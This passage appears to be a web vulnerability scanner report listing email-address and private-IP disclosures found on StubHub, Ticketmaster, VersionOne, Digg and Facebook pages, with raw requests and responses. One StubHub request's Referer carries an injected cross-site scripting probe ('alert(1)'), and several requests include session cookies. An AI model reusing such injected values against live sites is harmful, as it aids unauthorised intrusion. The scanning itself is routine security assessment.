GET /js/jquery.colorbox-min.js HTTP/1.1
Host: www.rallydev.com
Proxy-Connection: keep-alive
Referer: http://www.rallydev.com/agile_products/editions/community/signup/?ppc=google&kw=bug_tracking&gclid=CMWl_YzNjaoCFYpd5Qodq3Z4og
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2g3gkrl3hj7h7nuupane9re3r3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:37 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=300
Expires: Tue, 19 Jul 2011 14:25:37 GMT
P3P: CP="NON DSP COR CURa PSAa PSDa OUR NOR BUS PUR COM NAV STA"
Content-Length: 9281
Content-Type: text/javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V).f
...[SNIP]...

23.70. http://www.stubhub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-688439129 HTTP/1.1
Host: www.stubhub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62%27%3balert(1)//460f48c4516

Response

HTTP/1.1 502 Bad Gateway
Date: Tue, 19 Jul 2011 19:37:58 GMT
Server: Apache
Set-Cookie: TLTHID=9B57C998B23E10B2041EBFC06CA23456; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Content-Length: 341
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>502 Bad Gateway</title>
</head><body>
<h1>Bad Gateway</h1>
<p>The proxy server received an invalid
response from an upstream ser
...[SNIP]...
<a href="mailto:technology@stubhub.com">
...[SNIP]...

23.71. http://www.stubhub.com/content/getPromoContent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /content/getPromoContent

Issue detail

The following email address was disclosed in the response:

Request

POST /content/getPromoContent HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 27
Origin: http://www.stubhub.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; fsr.a=1311100549160; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; s_sess=%20s_cc%3Dtrue%3B

pageType=BrowseTicketDetail

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: Apache
Set-Cookie: TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
com-stubhub-dye: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 71

<?xml version="1.0" encoding="UTF-8"?><blocks>No Promo Content</blocks>

23.72. http://www.ticketmaster.com/event/000043582C516D43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /event/000043582C516D43

Issue detail

The following email address was disclosed in the response:

Request

GET /event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1 HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa PSAa CONo HISa TELo OURDELo UNRo IND PHY ONL UNI PUR COM NAV INT DEM"
Content-Type: text/html; charset=utf-8
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 154498
Date: Tue, 19 Jul 2011 18:36:25 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: ORIGIN=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Set-Cookie: BRAND=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
. A limited number of wheelchairs are located at the entrance gates to transport guests with limited mobility to their seating area. Guests may contact the New Meadowlands Stadium at 201-559-1515 or ADAinfo@nmstadco.com for more information or any additional needs. </p>
...[SNIP]...
<p>New Meadowlands Stadium Information: 201-559-1515 or ADAinfo@nmstadco.com<br>
...[SNIP]...

23.73. http://www.versionone.com/LandingPgTemp/js/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.versionone.com
Path:   /LandingPgTemp/js/global.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /LandingPgTemp/js/global.js HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 4056
Content-Type: application/x-javascript
Last-Modified: Tue, 02 Mar 2010 07:15:07 GMT
Accept-Ranges: bytes
ETag: "18db8316d8b9ca1:2220"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:22:27 GMT

<!--
// Default text on search input
function clickclear(thisfield, defaulttext) {
if (thisfield.value == defaulttext) {
   thisfield.value = "";
}
}
function clickrecall(thisfield, defaultt
...[SNIP]...
<a href=\""+emailCall+"pete@trailridgeconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"sales@featureplan.com\">sales@featureplan.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@automatedqa.com\">sales@automatedqa.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@atlassian.com\">sales@atlassian.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@solutionsiq.com\">info@solutionsiq.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@sligerconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"mike.shalloway@netobjectives.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.augustine@lithespeed.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.rdymond@innovel.net\">
...[SNIP]...
<a href=\""+emailCall+"david.hussman@devjam.com\">
...[SNIP]...
<a href=\""+emailCall+"ranton@ccpace.com\">
...[SNIP]...
<a href=\""+emailCall+"dmantica@aspetech.com\">
...[SNIP]...
<a href=\""+emailCall+"mary.anderson@3back.com\">
...[SNIP]...

23.74. http://www.versionone.com/js/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.versionone.com
Path:   /js/global.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/global.js HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://www.versionone.com/Product/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; _mkto_trk=id:040-EEX-147&token:_mch-versionone.com-1311085361365-31952; __utma=174222397.1249898466.1311085361.1311085361.1311085361.1; __utmb=174222397.1.10.1311085361; __utmc=174222397; __utmz=174222397.1311085361.1.1.utmgclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ|utmccn=(not%20set)|utmcmd=(not%20set); s_vi=[CS]v1|2712C995051D310C-4000012AC02E50CA[CE]; ASPSESSIONIDCCQACASR=JNBKCBDCLNHEPCHJEOODAHCK; s_sq=vonenewprod%3D%2526pid%253Dlead%252520form%25253A%252520agile%252520poster%25253A%252520mkto%252520form%2526pidt%253D1%2526oid%253Dhttp%25253A//www.versionone.com/Product%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 4436
Content-Type: application/x-javascript
Last-Modified: Wed, 07 Jul 2010 19:40:01 GMT
Accept-Ranges: bytes
ETag: "9c796330c1ecb1:2220"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:23:10 GMT

<!--
// Default text on search input
function clickclear(thisfield, defaulttext) {
if (thisfield.value == defaulttext) {
   thisfield.value = "";
}
}
function clickrecall(thisfield, defaultt
...[SNIP]...
<a href=\""+emailCall+"partnersales"+host+"\">PartnerSales@VersionOne.com</a>
...[SNIP]...
<a href=\""+emailCall+"pete@trailridgeconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"sales@featureplan.com\">sales@featureplan.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@automatedqa.com\">sales@automatedqa.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@atlassian.com\">sales@atlassian.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@solutionsiq.com\">info@solutionsiq.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@sligerconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"mike.shalloway@netobjectives.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.augustine@lithespeed.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.rdymond@innovel.net\">
...[SNIP]...
<a href=\""+emailCall+"david.hussman@devjam.com\">
...[SNIP]...
<a href=\""+emailCall+"ranton@ccpace.com\">
...[SNIP]...
<a href=\""+emailCall+"dmantica@aspeinc.com\">
...[SNIP]...
<a href=\""+emailCall+"mary.anderson@3back.com\">
...[SNIP]...

23.75. http://www.versionone.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.versionone.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17730
Content-Type: application/x-javascript
Last-Modified: Wed, 28 Apr 2010 14:45:01 GMT
Accept-Ranges: bytes
ETag: "168f7361e1e6ca1:2220"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:22:29 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

24. Private IP addresses disclosed  previous  next
There are 253 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


24.1. http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn2.diggstatic.com
Path:   /js/two_column/lib.61fe8366.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/two_column/lib.61fe8366.js HTTP/1.1
Host: cdn2.diggstatic.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=25569 10.2.128.186
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 166188
Accept-Ranges: bytes
Cache-Control: private, max-age=31536000
Age: 0
Expires: Wed, 18 Jul 2012 14:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

(function(d,f){function j(a,b,e){if(e===f&&a.nodeType===1){e=a.getAttribute("data-"+b);if(typeof e==="string"){try{e=e==="true"?true:e==="false"?false:e==="null"?null:!c.isNaN(e)?parseFloat(e):na.test
...[SNIP]...

24.2. http://developers.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?ref=pf HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.131.111
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:48 GMT
Content-Length: 13941

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_j
...[SNIP]...

24.3. http://developers.facebook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Thu, 18 Aug 2011 14:57:57 GMT
X-FB-Server: 10.32.145.113
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:57 GMT
Content-Length: 1150

..............h.......(....... ..... .....@........................................................................................ya..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..ya..........bE...
...[SNIP]...

24.4. http://developers.facebook.com/images/connect_showcase/platform_showcase_gallery_b.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /images/connect_showcase/platform_showcase_gallery_b.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/connect_showcase/platform_showcase_gallery_b.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.136.116
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 19903

.PNG
.
...IHDR.......t........    ....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

24.5. http://developers.facebook.com/images/devsite/icn_facebook_apps.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /images/devsite/icn_facebook_apps.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/devsite/icn_facebook_apps.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.74.130
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 4685

.PNG
.
...IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

24.6. http://developers.facebook.com/images/devsite/icn_mobile.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /images/devsite/icn_mobile.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/devsite/icn_mobile.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.167.120
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 2718

.PNG
.
...IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

24.7. http://developers.facebook.com/images/devsite/icn_open_source.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /images/devsite/icn_open_source.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/devsite/icn_open_source.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
